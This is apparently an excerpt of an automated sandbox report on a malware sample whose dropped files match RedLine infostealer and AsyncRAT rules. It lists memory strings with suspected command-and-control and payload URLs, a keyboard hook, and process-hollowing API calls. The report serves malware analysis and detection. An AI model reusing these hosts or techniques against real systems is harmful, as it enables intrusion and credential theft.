Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/95Z4
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/T
Source: alg.exe, 00000010.00000003.1785132829.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/f
Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/gs
Source: alg.exe, 00000010.00000003.1797911265.00000000005A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/p
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/pe6
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/pu6
Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/s
Source: alg.exe, 00000010.00000003.1918263435.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1917843582.00000000005A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/vdvikkmvoibst
Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.0000000000596000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197:80/f0
Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197:80/p
Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://bumxkqgxu.biz/
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dwrqljrr.biz/
Source: alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://nqwjmb.biz/
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tbjrpv.biz/k7/pV
Source: x.exe, 00000004.00000002.1593299514.000000007F670000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000000.1470846029.0000000000401000.00000020.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000A.00000003.1539123679.0000000004D50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.delphiexpert.ru
Source: x.exe, 00000004.00000002.1593299514.000000007F670000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000000.1470846029.0000000000401000.00000020.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000A.00000003.1539123679.0000000004D50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.delphiexpert.ruopenSV
Source: x.exe, x.exe, 00000004.00000002.1544141056.0000000000780000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002959000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1596172530.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1588992126.0000000021CF5000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478393290.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.000000000295A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1588565232.0000000021AF0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000000.1541408812.0000000000416000.00000002.00000001.01000000.00000007.sdmp, wdmvmswJ.pif, 0000001E.00000000.1659150073.0000000000416000.00000002.00000001.01000000.00000007.sdmp, wdmvmswJ.pif, 00000026.00000000.1748296146.0000000000416000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.pmail.com
Source: wdmvmswJ.pif, 0000000C.00000003.2071578798.0000000020950000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chichometextiles.com/
Source: x.exe, 00000004.00000002.1582582313.00000000208DD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://chichometextiles.com/wp-
Source: x.exe, 00000004.00000002.1582582313.00000000208EC000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.000000000072F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.00000000208C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://chichometextiles.com/wp-admin/233_Jwsmvmdweya
Source: x.exe, 00000004.00000002.1544141056.00000000006BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chichometextiles.com/wp-admin/233_JwsmvmdweyaM
Source: x.exe, 00000004.00000002.1544141056.000000000072F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chichometextiles.com:443/wp-admin/233_Jwsmvmdweyah
Source: wdmvmswJ.pif, 0000000C.00000003.2111219568.0000000020950000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\Public\Libraries\wdmvmswJ.pif Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\wdmvmswJ.pif

System Summary

Source: 38.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 30.2.wdmvmswJ.pif.400000.3.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 30.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 30.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 30.2.wdmvmswJ.pif.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 38.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 38.2.wdmvmswJ.pif.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 38.2.wdmvmswJ.pif.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000026.00000001.1748961423.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001E.00000001.1659980996.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001E.00000002.1740115481.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000026.00000002.1813978225.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B08670 NtUnmapViewOfSection, 4_2_02B08670
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B08400 NtReadVirtualMemory, 4_2_02B08400
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B07A2C NtAllocateVirtualMemory, 4_2_02B07A2C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 4_2_02B0DC8C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 4_2_02B0DC04
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B08D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 4_2_02B08D70
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 4_2_02B0DD70
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B07D78 NtWriteVirtualMemory, 4_2_02B07D78
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B07A2A NtAllocateVirtualMemory, 4_2_02B07A2A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 4_2_02B0DBB0
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B08D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 4_2_02B08D6E
Source: C:\Users\Public\alpha.pif Code function: 13_2_00024823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 13_2_00024823
Source: C:\Users\Public\alpha.pif Code function: 13_2_0002643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 13_2_0002643A
Source: C:\Users\Public\alpha.pif Code function: 13_2_00037460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 13_2_00037460
Source: C:\Users\Public\alpha.pif Code function: 13_2_000264CA NtQueryInformationToken, 13_2_000264CA
Source: C:\Users\Public\alpha.pif Code function: 13_2_00026500 NtQueryInformationToken,NtQueryInformationToken, 13_2_00026500
Source: C:\Users\Public\alpha.pif Code function: 13_2_0003A135 NtSetInformationFile, 13_2_0003A135
Source: C:\Users\Public\alpha.pif Code function: 13_2_0003C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 13_2_0003C1FA
Source: C:\Users\Public\alpha.pif Code function: 13_2_00014E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp, 13_2_00014E3B
Source: C:\Users\Public\alpha.pif Code function: 13_2_00024759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError, 13_2_00024759
Source: C:\Users\Public\alpha.pif Code function: 17_2_00024823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 17_2_00024823
Source: C:\Users\Public\alpha.pif Code function: 17_2_0002643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 17_2_0002643A
Source: C:\Users\Public\alpha.pif Code function: 17_2_00037460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 17_2_00037460
Source: C:\Users\Public\alpha.pif Code function: 17_2_000264CA NtQueryInformationToken, 17_2_000264CA
Source: C:\Users\Public\alpha.pif Code function: 17_2_00026500 NtQueryInformationToken,NtQueryInformationToken, 17_2_00026500
Source: C:\Users\Public\alpha.pif Code function: 17_2_0003A135 NtSetInformationFile, 17_2_0003A135
Source: C:\Users\Public\alpha.pif Code function: 17_2_0003C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 17_2_0003C1FA
